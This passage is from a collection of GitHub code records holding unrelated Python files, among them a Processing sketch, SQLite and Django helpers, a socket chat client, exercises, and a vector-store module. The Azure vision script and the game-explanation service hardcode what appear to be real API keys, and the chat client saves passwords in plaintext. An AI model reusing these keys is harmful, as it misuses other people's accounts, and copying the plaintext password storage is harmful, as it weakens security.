pb.SerializeToString()\n","repo_name":"Cisco-8000-sonic/sonic-mgmt_1","sub_path":"tests/dash/proto_utils.py","file_name":"proto_utils.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"34097470902","text":"margin = 20\ngrid_size = 500\nperms = ((0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0))\n\ndef setup():\n size(1500, 1000)\n 
text_align(LEFT, CENTER)\n background(128)\n no_stroke()\n for n in range(3):\n grid(margin, margin, grid_size - margin * 2, 4, perms[n])\n with push_matrix():\n translate(0, grid_size)\n grid(margin, margin, grid_size - margin * 2, 4, perms[n + 3])\n translate(grid_size, 0)\n save('out_0.png')\n\ndef grid(xo, yo, largura_total, n, perm):\n w = largura_total / n\n color_step = 255 / n\n half_step = color_step / 2\n text_size(w / 8)\n text_leading(w / 9)\n for j in range(n):\n x = xo + w * j + w / 2\n for i in range(n):\n y = yo + w * i + w / 2\n a = round(half_step + i * color_step)\n b = round(half_step + j * color_step) \n c = round(255 - i * color_step - half_step)\n R, G, B = (a, b, c)[perm[0]], (a, b, c)[perm[1]], (a, b, c)[perm[2]] \n fill(R, G, B) \n circle(x, y, w * 0.98)\n fill(255)\n text(f'R:{R}\\nG:{G}\\nB:{B}\\n', x, y) \n \n","repo_name":"villares/sketch-a-day","sub_path":"2023/sketch_2023_04_03/sketch_2023_04_03_0.py","file_name":"sketch_2023_04_03_0.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"71"} +{"seq_id":"9909560993","text":"import sqlite3\n\n\nclass SVGDatabase:\n DEFAULT_GIFT_TABLE_NAME = \"gifts\"\n DEFAULT_ITEM_TABLE_NAME = \"items\"\n DEFAULT_ITEM_ATTRIBUTES_TABLE_NAME = \"item_attributes\"\n\n def __init__(self,\n database_path,\n gift_table_name=DEFAULT_GIFT_TABLE_NAME,\n item_table_name=DEFAULT_ITEM_TABLE_NAME,\n item_attributes_table_name=DEFAULT_ITEM_ATTRIBUTES_TABLE_NAME):\n\n self.gift_table_name = gift_table_name\n self.item_table_name = item_table_name\n self.item_attributes_table_name = item_attributes_table_name\n\n self.database_path = database_path\n self.conn = None\n self.cursor = self.get_cursor()\n\n self.build_all(self.cursor)\n\n def write_reactions(self, reactions):\n statement = \"INSERT INTO {} VALUES(?, ?, ?)\" \\\n .format(self.gift_table_name)\n args = [(x.villager, x.item, x.reaction) for x in reactions]\n self.write_list(statement, args)\n\n def write_items(self, items):\n statement = \"INSERT INTO {} VALUES(?, ?, ?)\" \\\n .format(self.item_table_name)\n args = [(x.name, x.source, x.season) for x in items]\n self.write_list(statement, args)\n\n def write_item_attributes(self, items):\n # conflict set to handle catfish season corner case\n statement = \"\"\"INSERT INTO {} VALUES(?, ?, ?) \n ON CONFLICT DO NOTHING\"\"\" \\\n .format(self.item_attributes_table_name)\n\n args = []\n for item in items:\n for attribute in item.attributes:\n for value in item.attributes[attribute]:\n arg = (item.name, attribute, value)\n args.append(arg)\n self.write_list(statement, args)\n\n def write_list(self, statement, args):\n \"\"\" Executes the given statement with every argument in \n the args list. 
\"\"\"\n\n for arg in args:\n print(arg)\n self.cursor.execute(statement, arg)\n\n def get_cursor(self):\n self.conn = sqlite3.connect(f\"{self.database_path}.db\")\n return self.conn.cursor()\n\n def commit(self):\n self.conn.commit()\n self.conn.close()\n\n def build_items_db(self, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists {}(\n name TEXT PRIMARY KEY NOT NULL, \n source TEXT NOT NULL,\n season TEXT NOT NULL)\"\"\" \\\n .format(self.item_table_name))\n\n def build_gifts_db(self, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists {}(\n villager TEXT NOT NULL, \n item TEXT NOT NULL, \n reaction TEXT NOT NULL,\n PRIMARY KEY(villager, item))\"\"\" \\\n .format(self.gift_table_name))\n\n def build_item_attributes_db(self, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists {}(\n item TEXT NOT NULL, \n attribute TEXT NOT NULL,\n value TEXT NOT NULL,\n PRIMARY KEY(item, attribute, value))\"\"\" \\\n .format(self.item_attributes_table_name))\n\n def build_all(self, cursor):\n self.build_item_attributes_db(cursor)\n self.build_gifts_db(cursor)\n","repo_name":"edmanf/StardewGifts","sub_path":"StardewGifts/SVGDatabase.py","file_name":"SVGDatabase.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20241455571","text":"import threading\r\nimport socket\r\nimport pickle\r\n\r\nclass Client:\r\n nama = input(str('masukkan username'))\r\n pw = input(str('masukkan pasword'))\r\n pickle_out=open(\"Serialize\",\"wb\")\r\n pickle.dump(nama,pickle_out)\r\n pickle.dump(pw, pickle_out)\r\n\r\n pickle_out.close()\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n host = socket.gethostname()\r\n port = 59000\r\n client.connect((host, port))\r\nobj=Client()\r\n\r\ndef clien_menerima():\r\n while True:\r\n try:\r\n message = obj.client.recv(5024).decode('utf-8')\r\n if message == 'nama?' 
and 'pw?':\r\n obj.client.send(obj.nama.encode('utf-8'))\r\n obj.client.send(obj.pw.encode('utf-8'))\r\n else:\r\n print(message)\r\n #pickle_out = message\r\n pickle_out = open(\"Serialize\",\"wb\")\r\n #example_dict = pickle.load((pickle_in))\r\n pickle.dump(message,pickle_out)\r\n pickle_out.close()\r\n except:\r\n print('error')\r\n obj.client.close()\r\n break\r\n\r\n\r\n\r\ndef client_mengirim():\r\n while True:\r\n\r\n menginput=input(\"\")\r\n message = f'{obj.nama}:{menginput}'\r\n #pickle_out=open(\"Serialize\",\"wb\")\r\n #pickle.dump(message,pickle_out)\r\n obj.client.send(message.encode())\r\n #pickle_out.close()\r\ndef THREAD():\r\n receive_Thread = threading.Thread(target = clien_menerima)\r\n receive_Thread.start()\r\n\r\n send_Thread = threading.Thread(target=client_mengirim)\r\n send_Thread.start()\r\n\r\nTHREAD()\r\n","repo_name":"ImamBiladi27/TCP_Repilcation","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29698850151","text":"print('Sequência de FIBONACC')\nprint('-'*100)\nnum = int(input('Quantos termos mostrar?'))\nt1 = 0\nt2 = 1\nprint('{} {}'.format(t1, t2), end=' ')\ncont = 3\nwhile cont <= num:\n t3 = t1+t2\n print('{}'.format(t3), end=' ')\n t1 = t2\n t2 = t3\n cont += 1\nprint('FIM')","repo_name":"Vsvilella/EX-python","sub_path":"desafio63.py","file_name":"desafio63.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27485146746","text":"def countLetters(string):\n d = {}\n final = \"\"\n for x in range(0, len(string)):\n if string[x] not in d.keys():\n d[string[x]] = 1\n elif string[x] in d.keys():\n d[string[x]] += 1\n for key, value in sorted(d.iteritems()):\n final += key + str(value)\n return final\n\nprint(countLetters(\"AAAABBBCCDE\"))\n","repo_name":"yevgen93/python","sub_path":"algorithms/string_traverse.py","file_name":"string_traverse.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"30911157644","text":"\nimport unittest\n\n\ndef trim(s, c=\" \"):\n i = 0\n for k in range(0, len(s)):\n i = k\n if s[k] != c:\n if s[k] == \".\":\n i -= 1\n break\n j = len(s)\n for k in range(len(s), 0, -1):\n j = k\n if s[k-1] != c:\n break\n return s[i:j]\n\n\nclass Solution:\n def isValid(self, S, i, j):\n s = S[i:j+1]\n if len(s) > 1 and float(s) == 0:\n return False\n return True\n\n def isValid2(self, e):\n e2 = float(e)\n if e2 == int(e2):\n return len(str(int(e2))) == len(e)\n else:\n\n return len(trim(e, \"0\")) == len(e)\n\n def gen(self, S, i, j):\n s = S[i:j+1]\n r = []\n if self.isValid2(s):\n r.append(s)\n for k in range(1, len(s)):\n e = s[0:k] + \".\" + s[k:]\n # print(e, self.isValid2(e))\n if self.isValid2(e):\n r.append(e)\n return r\n\n def ambiguousCoordinates(self, S):\n \"\"\"\n :type S: str\n :rtype: List[str]\n \"\"\"\n S = S[1:-1]\n r = []\n for i in range(0, len(S) - 1):\n if self.isValid(S, 0, i) and self.isValid(S, i+1, len(S) - 1):\n left = self.gen(S, 0, i)\n right = self.gen(S, i+1, len(S) - 1)\n # print(\"left\", left)\n # print(\"right\", right)\n for s1 in left:\n for s2 in right:\n r.append(\"(%s, %s)\" % (s1, s2))\n\n # print(r)\n return r\n\n\nclass TestSolution(unittest.TestCase):\n def test_trim(self):\n self.assertEqual(trim(\" 1234\"), \"1234\")\n self.assertEqual(trim(\"1234 
\"), \"1234\")\n self.assertEqual(trim(\" 1234 \"), \"1234\")\n self.assertEqual(trim(\"xxx1234xxx\", \"x\"), \"1234\")\n\n def test_gen(self):\n s = Solution()\n self.assertListEqual(s.gen(\"12\", 0, 1), [\"12\", \"1.2\"])\n self.assertListEqual(s.gen(\"100\", 0, 2), [\"100\"])\n self.assertListEqual(s.gen(\"001\", 0, 2), [\"0.01\"])\n self.assertListEqual(s.gen(\"0\", 0, 0), [\"0\"])\n self.assertListEqual(s.gen(\"000001\", 0, 5), [\"0.00001\"])\n\n def test_ambiguousCoordinates(self):\n s = Solution()\n l = s.ambiguousCoordinates(\"(123)\")\n r = [\"(1, 23)\", \"(12, 3)\", \"(1.2, 3)\", \"(1, 2.3)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(00011)\")\n r = [\"(0.001, 1)\", \"(0, 0.011)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(0123)\")\n r = [\"(0, 123)\", \"(0, 12.3)\", \"(0, 1.23)\",\n \"(0.1, 23)\", \"(0.1, 2.3)\", \"(0.12, 3)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(100)\")\n r = [\"(10, 0)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(0000001)\")\n r = [\"(0, 0.00001)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"pipi32167/LeetCode","sub_path":"py/816.py","file_name":"816.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22576012414","text":"# imports\nfrom django_seed import Seed\nfrom faker import Faker\nimport random\n\nfrom django.utils import timezone\nfrom django.core import management\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\n\nfrom distance import models as distance_models\nfrom accounts import models as accounts_models\n\n# End: imports -----------------------------------------------------------------\n\n# OBS: seed() on instance was depricated for Faker module.\n# Manually edited django-seed module __init__.py on line 35 from seed to seed_instance\n\n# Settings:\nUser = get_user_model()\n\nclass Command(BaseCommand):\n\n def i(self, x, y):\n return random.randint(x, y)\n\n def fake_rgba(self, x=0, y=255):\n r, g, b, a = self.i(x,y), self.i(x,y), self.i(x,y), random.choice([0.6, 0.7, 0.8, 0.9, 1])\n return f\"rgba({r},{g},{b},{a})\"\n\n def f(self):\n seeder = Seed.seeder()\n\n seeder.faker.seed_instance(1234)\n\n seeder.add_entity(accounts_models.Department, 6, {\n 'name': lambda x: seeder.faker.word(),\n 'short_name': lambda x: seeder.faker.word(),\n })\n seeder.add_entity(User, 20, {\n # 'department': lambda x: seeder.faker.word(),\n })\n seeder.add_entity(distance_models.Workout, 200, {\n 'distance': lambda x: round(random.uniform(0, 20), 1),\n 'type': lambda x: random.randint(0, 6),\n 'comment': lambda x: seeder.faker.sentence(nb_words=2),\n 'date': lambda x: seeder.faker.date_this_year(after_today=False),\n })\n\n seeder.execute()\n\n\n\n def handle(self, *args, **options):\n self.f()\n # End of handle\n","repo_name":"emilte/idretten-oerland","sub_path":"main/management/commands/myseed.py","file_name":"myseed.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35918888543","text":"import base64\n\nimport openai\nimport json\nimport os\nfrom gtts import gTTS\nfrom app.services.explanation_ai.primary_model.distance import distance\nfrom 
app.services.explanation_ai.primary_model.favor_unfavor import favor\nfrom app.services.explanation_ai.primary_model.if_use_spell_well import if_use_spell_well\nfrom app.services.explanation_ai.primary_model.spell1 import spell1\nfrom app.services.explanation_ai.primary_model.spell2 import spell2\nfrom app.services.explanation_ai.primary_model.what_to_what import what_to_what\nfrom moviepy.editor import VideoFileClip\n\n\ndef final(VIDEO_PATH):\n video = VIDEO_PATH.split(\"/\")[3].split(\".\")[0]\n GIF_PATH = f\"app/services/explanation_ai/gif/{video}.gif\"\n\n try:\n os.remove(GIF_PATH)\n except OSError:\n pass\n\n\n # Set up the OpenAI API client\n openai.api_key = \"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\"\n\n b_proto1 = spell1(VIDEO_PATH)\n b_proto2 = spell2(VIDEO_PATH)\n a_proto = favor(VIDEO_PATH)\n\n if b_proto1 == \"don't use\" and b_proto2 == \"don't use\":\n b = \"0\"\n elif b_proto1 == \"use\" and b_proto2 == \"don't use\":\n b = \"1\"\n elif b_proto1 == \"don't use\" and b_proto2 == \"use\":\n b = \"1\"\n else:\n b = \"2\"\n\n a = f\"팀의 파워는 {a_proto}\"\n b = f\"플레이어는 {b}개의 주문을 사용했다.\"\n c = f\"플레이어는 적과의 거리조절을 {distance(VIDEO_PATH)}\"\n d = f\"전투는 {what_to_what(VIDEO_PATH)} 싸움이다.\"\n e = f\"{if_use_spell_well(VIDEO_PATH)}\"\n\n\n if b_proto1 == \"don't have\" and b_proto2 == \"don't have\":\n e = \"스펠이 없었다.\"\n\n # Define the list of sentences that describe the situation\n situation = [\n \"플레이어는 리그 오브 레전드를 플레이 중이다.\",\n \"플레이어는 사망했다\",\n a,\n b,\n c,\n d,\n e\n ]\n # Concatenate the sentences together to form a single string\n input_text = \" \".join(situation)\n print(input_text)\n # Generate a sentence that describes the situation using the GPT model\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=input_text,\n max_tokens=300\n )\n\n # Extract the generated sentence from the API response\n output_text = response.choices[0].text.strip()\n print(f\"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{output_text}\")\n tts = gTTS(text=output_text, lang='ko')\n audio_output_file = f\"app/services/explanation_ai/audio/{video}.mp3\"\n if os.path.exists(audio_output_file):\n os.remove(audio_output_file)\n tts.save(audio_output_file)\n with open(audio_output_file, \"rb\") as audio_file:\n audio_data = audio_file.read()\n\n a = VideoFileClip(VIDEO_PATH).resize(height=240).set_fps(5)\n a.write_gif(GIF_PATH)\n with open(GIF_PATH, \"rb\") as gif_file:\n gif_base64 = base64.b64encode(gif_file.read()).decode('utf-8')\n\n output = json.dumps({\"output_text\": output_text, \"tts\": audio_data.decode('latin1'), \"gif\": gif_base64})\n\n print(output)\n return output\n\n","repo_name":"32192442sangho/TeamProject","sub_path":"app/services/explanation_ai/final/explanation.py","file_name":"explanation.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42375014978","text":"from azure.cognitiveservices.vision.customvision.prediction import CustomVisionPredictionClient\nimport json\nimport glob\nfiles = []\ndata = []\nfiles = ['data.json']\n\n\nprediction_key = \"b07c005ad5ad46ec937dcdd08486ba58\"\nENDPOINT = \"https://southcentralus.api.cognitive.microsoft.com/\"\nProject_id = \"253ff62d-4245-486a-b41e-921e94379e3b\"\npublish_iteration_name = \"kesha123\"\n\npredictor = CustomVisionPredictionClient(prediction_key, endpoint=ENDPOINT)\n\nfor file in glob.glob(\"C:/Users/Lalit Ak Radadiya/Desktop/Data/test/*\"):\n base_image_url = file\n with open(base_image_url, 
\"rb\") as image_contents:\n results = predictor.classify_image(\n Project_id, publish_iteration_name, image_contents.read())\n\n # Display the results.\n for prediction in results.predictions:\n print(\"\\t\" + prediction.tag_name)\n t = prediction.tag_name\n data.append({\n 'name': t,\n 'price': \"20rs\"\n })\n break\n\n # end with\n with open('data.json', 'w+') as outfile:\n json.dump(data, outfile)\n\n # end with\n files = ['data.json']\n","repo_name":"LalitAkRadadiya/RSU-demo","sub_path":"Multi.py","file_name":"Multi.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3215151768","text":"from typing import Dict, Callable, List\nfrom openstack_api.openstack_flavor import OpenstackFlavor\nfrom st2common.runners.base_action import Action\n\n\nclass FlavorActions(Action):\n def __init__(self, *args, config: Dict = None, **kwargs):\n \"\"\"constructor class\"\"\"\n super().__init__(*args, config=config, **kwargs)\n self._flavor_api: OpenstackFlavor = config.get(\n \"openstack_flavor_api\", OpenstackFlavor()\n )\n\n def run(self, submodule: str, **kwargs):\n \"\"\"\n Dynamically dispatches to the method wanted\n \"\"\"\n func: Callable = getattr(self, submodule)\n return func(**kwargs)\n\n def list_missing_flavors(\n self,\n source_cloud: str,\n dest_cloud: str,\n ) -> List[str]:\n \"\"\"\n Calls missing_flavors from _flavor_api to get a list of flavors that are\n in the source cloud but are missing from the destination cloud.\n :param source_cloud: Cloud account for source cloud\n :param dest_cloud: Cloud account for destination cloud\n :returns: List of the names of missing flavors or empty List if no flavors are missing\n \"\"\"\n return self._flavor_api.migrate_flavors(\n source_cloud=source_cloud,\n dest_cloud=dest_cloud,\n )\n","repo_name":"stfc/st2-cloud-pack","sub_path":"actions/src/flavor_actions.py","file_name":"flavor_actions.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3926839688","text":"\"\"\"\"\nDay7\n\"\"\"\n\nimport re\nimport sys\n\n\nPENALTY = 60\nNUM_WORKERS = 5\n\nclass Worker(object):\n def __init__(self, node):\n self.node = node\n self.time = Worker.time_to_complete(node)\n\n @staticmethod\n def time_to_complete(char):\n return int(char.encode('hex'), 16) - 64 + PENALTY\n\n def tick(self):\n self.time -= 1\n return self.time\n\n\ndef main():\n if len(sys.argv) > 1:\n with open(sys.argv[1], 'r') as s:\n values = s.readlines()\n else:\n values = sys.stdin.readlines()\n\n graph = {}\n blocks = {}\n nodes = set()\n\n for value in values:\n match = re.match(r'Step (\\w) must be finished before step (\\w) can begin\\.', value)\n\n val_first = match.groups()[0]\n val_second = match.groups()[1]\n\n graph.setdefault(val_first, []).append(val_second)\n blocks.setdefault(val_second, []).append(val_first)\n\n\n nodes.add(val_first)\n nodes.add(val_second)\n\n # for k,v in graph.iteritems():\n # print(k, time_to_complete(k), v)\n # print(nodes)\n #\n # for k,v in blocks.iteritems():\n # print(k, v)\n # print(nodes)\n\n # find root\n roots = sorted(nodes - set(blocks.keys()))\n walked = set()\n\n def is_runnable(node):\n blocking = blocks.get(node, [])\n return not any([x in nodes for x in blocking])\n\n queue = roots\n workers = []\n ticks = 0\n while queue or len(workers) > 0:\n runnable = sorted(filter(is_runnable, queue ))\n\n while runnable and len(workers) < 
NUM_WORKERS:\n node = runnable.pop(0)\n queue.remove(node)\n workers.append(Worker(node))\n\n next_nodes = []\n workers_done = []\n for worker in workers:\n worker.tick()\n if worker.time == 0:\n # Worker done!\n sys.stdout.write(worker.node)\n walked.add(worker.node)\n nodes.remove(worker.node)\n next_nodes.extend(graph.get(worker.node, []))\n workers_done.append(worker)\n\n for worker in workers_done:\n workers.remove(worker)\n\n queue.extend(next_nodes)\n queue = sorted(set(queue) - walked)\n\n ticks += 1\n\n print('')\n print(ticks)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dahallgren/adventOfCode2018","sub_path":"7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28164721451","text":"\"\"\"Interface for storing vectors.\"\"\"\n\nimport abc\nimport os\nimport pickle\nfrom typing import Iterable, Optional, Sequence, Type, cast\n\nimport numpy as np\n\nfrom ..schema import SpanVector, VectorKey\nfrom ..utils import open_file\n\n\nclass VectorStore(abc.ABC):\n \"\"\"Interface for storing and retrieving vectors.\"\"\"\n\n # The global name of the vector store.\n name: str\n\n @abc.abstractmethod\n def save(self, base_path: str) -> None:\n \"\"\"Save the store to disk.\"\"\"\n pass\n\n @abc.abstractmethod\n def load(self, base_path: str) -> None:\n \"\"\"Load the store from disk.\"\"\"\n pass\n\n @abc.abstractmethod\n def size(self) -> int:\n \"\"\"Return the number of vectors in the store.\"\"\"\n pass\n\n @abc.abstractmethod\n def add(self, keys: list[VectorKey], embeddings: np.ndarray) -> None:\n \"\"\"Add or edit the given keyed embeddings to the store.\n\n If the keys already exist they will be overwritten, acting as an \"upsert\".\n\n Args:\n keys: The keys to add the embeddings for.\n embeddings: The embeddings to add. This should be a 2D matrix with the same length as keys.\n \"\"\"\n pass\n\n @abc.abstractmethod\n def get(self, keys: Optional[Iterable[VectorKey]] = None) -> np.ndarray:\n \"\"\"Return the embeddings for given keys.\n\n Args:\n keys: The keys to return the embeddings for. 
If None, return all embeddings.\n\n Returns:\n The embeddings for the given keys.\n \"\"\"\n pass\n\n def topk(\n self, query: np.ndarray, k: int, keys: Optional[Iterable[VectorKey]] = None\n ) -> list[tuple[VectorKey, float]]:\n \"\"\"Return the top k most similar vectors.\n\n Args:\n query: The query vector.\n k: The number of results to return.\n keys: Optional keys to restrict the search to.\n\n Returns:\n A list of (key, score) tuples.\n \"\"\"\n raise NotImplementedError\n\n\nPathKey = VectorKey\n\n_SPANS_PICKLE_NAME = 'spans.pkl'\n\n\nclass VectorDBIndex:\n \"\"\"Stores and retrives span vectors.\n\n This wraps a regular vector store by adding a mapping from path keys, such as (rowid1, 0),\n to span keys, such as (rowid1, 0, 0), which denotes the first span in the (rowid1, 0) document.\n \"\"\"\n\n def __init__(self, vector_store: str) -> None:\n self._vector_store: VectorStore = get_vector_store_cls(vector_store)()\n # Map a path key to spans for that path.\n self._id_to_spans: dict[PathKey, list[tuple[int, int]]] = {}\n self._rowid_to_path_keys: dict[str, list[PathKey]] = {}\n\n def load(self, base_path: str) -> None:\n \"\"\"Load the vector index from disk.\"\"\"\n assert not self._id_to_spans, 'Cannot load into a non-empty index.'\n with open_file(os.path.join(base_path, _SPANS_PICKLE_NAME), 'rb') as f:\n all_spans: list[tuple[PathKey, list[tuple[int, int]]]] = pickle.load(f)\n self._id_to_spans.update(all_spans)\n for path_key, _ in all_spans:\n rowid = cast(str, path_key[0])\n self._rowid_to_path_keys.setdefault(rowid, []).append(path_key)\n self._vector_store.load(os.path.join(base_path, self._vector_store.name))\n\n def save(self, base_path: str) -> None:\n \"\"\"Save the vector index to disk.\"\"\"\n assert self._id_to_spans, 'Cannot save an empty index.'\n with open_file(os.path.join(base_path, _SPANS_PICKLE_NAME), 'wb') as f:\n pickle.dump(list(self._id_to_spans.items()), f)\n self._vector_store.save(os.path.join(base_path, self._vector_store.name))\n\n def add(\n self, all_spans: Sequence[tuple[PathKey, list[tuple[int, int]]]], embeddings: np.ndarray\n ) -> None:\n \"\"\"Add the given spans and embeddings.\n\n Args:\n all_spans: The spans to initialize the index with.\n embeddings: The embeddings to initialize the index with.\n \"\"\"\n vector_keys = [(*path_key, i) for path_key, spans in all_spans for i in range(len(spans))]\n assert len(vector_keys) == len(\n embeddings\n ), f'Number of spans ({len(vector_keys)}) and embeddings ({len(embeddings)}) must match.'\n\n self._id_to_spans.update(all_spans)\n for path_key, _ in all_spans:\n rowid = cast(str, path_key[0])\n self._rowid_to_path_keys.setdefault(rowid, []).append(path_key)\n\n self._vector_store.add(vector_keys, embeddings)\n\n def get_vector_store(self) -> VectorStore:\n \"\"\"Return the underlying vector store.\"\"\"\n return self._vector_store\n\n def get(self, keys: Iterable[PathKey]) -> Iterable[list[SpanVector]]:\n \"\"\"Return the spans with vectors for each key in `keys`.\n\n Args:\n keys: The keys to return the vectors for.\n\n Returns:\n The span vectors for the given keys.\n \"\"\"\n all_spans: list[list[tuple[int, int]]] = []\n all_vector_keys: list[list[VectorKey]] = []\n for path_key in keys:\n spans = self._id_to_spans.get(path_key, [])\n all_spans.append(spans)\n all_vector_keys.append([(*path_key, i) for i in range(len(spans))])\n\n offset = 0\n flat_vector_keys = [key for vector_keys in all_vector_keys for key in (vector_keys or [])]\n all_vectors = self._vector_store.get(flat_vector_keys)\n for 
spans in all_spans:\n vectors = all_vectors[offset : offset + len(spans)]\n yield [{'span': span, 'vector': vector} for span, vector in zip(spans, vectors)]\n offset += len(spans)\n\n def topk(\n self, query: np.ndarray, k: int, rowids: Optional[Iterable[str]] = None\n ) -> list[tuple[PathKey, float]]:\n \"\"\"Return the top k most similar vectors.\n\n Args:\n query: The query vector.\n k: The number of results to return.\n rowids: Optional row ids to restrict the search to.\n\n Returns:\n A list of (rowid, score) tuples.\n \"\"\"\n total_num_span_keys = self._vector_store.size()\n k = min(k, total_num_span_keys)\n span_keys: Optional[list[VectorKey]] = None\n if rowids is not None:\n span_keys = []\n for rowid in rowids:\n path_keys = self._rowid_to_path_keys.get(rowid)\n if path_keys is None:\n continue\n\n span_keys.extend(\n [\n (*path_key, i)\n for path_key in path_keys\n for i in range(len(self._id_to_spans[path_key]))\n ]\n )\n k = min(k, len(span_keys))\n span_k = k\n path_key_scores: dict[PathKey, float] = {}\n seen_rowids: dict[str, bool] = {}\n while (\n len(seen_rowids) < k\n and span_k <= total_num_span_keys\n and (not span_keys or span_k <= len(span_keys))\n ):\n span_k += k\n vector_key_scores = self._vector_store.topk(query, span_k, span_keys)\n for (*path_key_list, _), score in vector_key_scores:\n path_key = tuple(path_key_list)\n if path_key not in path_key_scores:\n path_key_scores[path_key] = score\n rowid = cast(str, path_key[0])\n if rowid not in seen_rowids:\n seen_rowids[rowid] = True\n\n top_rowids = set(list(seen_rowids.keys())[:k])\n top_path_keys = [(key, s) for (key, s) in path_key_scores.items() if key[0] in top_rowids]\n return list(top_path_keys)\n\n\nVECTOR_STORE_REGISTRY: dict[str, Type[VectorStore]] = {}\n\n\ndef register_vector_store(vector_store_cls: Type[VectorStore]) -> None:\n \"\"\"Register a vector store in the global registry.\"\"\"\n if vector_store_cls.name in VECTOR_STORE_REGISTRY:\n raise ValueError(f'Vector store \"{vector_store_cls.name}\" has already been registered!')\n\n VECTOR_STORE_REGISTRY[vector_store_cls.name] = vector_store_cls\n\n\ndef get_vector_store_cls(vector_store_name: str) -> Type[VectorStore]:\n \"\"\"Return a registered vector store given the name in the registry.\"\"\"\n return VECTOR_STORE_REGISTRY[vector_store_name]\n\n\ndef clear_vector_store_registry() -> None:\n \"\"\"Clear the vector store registry.\"\"\"\n VECTOR_STORE_REGISTRY.clear()\n","repo_name":"lilacai/lilac","sub_path":"lilac/embeddings/vector_store.py","file_name":"vector_store.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"71"} +{"seq_id":"33628240566","text":"# 2635 수 이어가기 : 맞왜틀 \nn = int(input())\nmax_nl = [] # 뽑은 수 저장 리스트\nmax_len = 0 # 최대 개수의 수\n\n# 1부터 입력된 양수까지 반복\nfor j in range(1, n+1):\n nl = [n, j] # 임시 리스트\n i = 0\n \n while True:\n a = nl[i] - nl[i+1]\n i+=1\n # 음의 정수가 만들어지면 중단\n if a < 0:\n break\n # 첫째 수 - 둘째 수 저장\n nl.append(a)\n \n # 새로운 임시 리스트가 기존에 저장된 리스트의 원소 수 보다 많으면 교체\n if max_len < len(nl):\n max_len = len(nl)\n max_nl = nl[:]\n\nprint(max_len)\nprint(*max_nl)\n\n# 다른사람의 답안...\n# first_num = int(input())\n# # second_num = first_num // 2 + 1 \n# # # 절반 이하로 2번째 수를 정하게 되면 4번째 수에서 끝나기 때문 -> 틀린 아이디어 같음.\n# len_result = 0\n# result = []\n\n# # for i in range(first_num-1, second_num, -1):\n# for i in range(first_num+1):\n# result_list = [first_num, i]\n# j = 0\n# while True:\n# last_num = result_list[j] - result_list[j+1]\n# j += 1\n# if last_num < 
0:\n# break\n# result_list.append(last_num)\n# if len_result < len(result_list):\n# len_result = len(result_list)\n# result = result_list[:]\n\n# print(len_result)\n# final_result = [str(result[i]) for i in range(len(result))]\n# print(' '.join(final_result))","repo_name":"White-Asher/algorithm","sub_path":"Coding-Test-Python/Baekjoon_OJ/BOJ_SWEA-IM/2635[S5] 수 이어가기.py","file_name":"2635[S5] 수 이어가기.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14918505270","text":"from xivo_bus.resources.endpoint_iax.event import (\n IAXEndpointCreatedEvent,\n IAXEndpointDeletedEvent,\n IAXEndpointEditedEvent,\n)\n\nfrom wazo_confd import bus, sysconfd\n\nfrom .schema import IAXSchema\n\nENDPOINT_IAX_FIELDS = [\n 'id',\n 'tenant_uuid',\n 'name',\n 'trunk.id',\n]\n\n\nclass IAXEndpointNotifier:\n def __init__(self, sysconfd, bus):\n self.sysconfd = sysconfd\n self.bus = bus\n\n def send_sysconfd_handlers(self):\n handlers = {'ipbx': ['iax2 reload']}\n self.sysconfd.exec_request_handlers(handlers)\n\n def created(self, iax):\n iax_serialized = 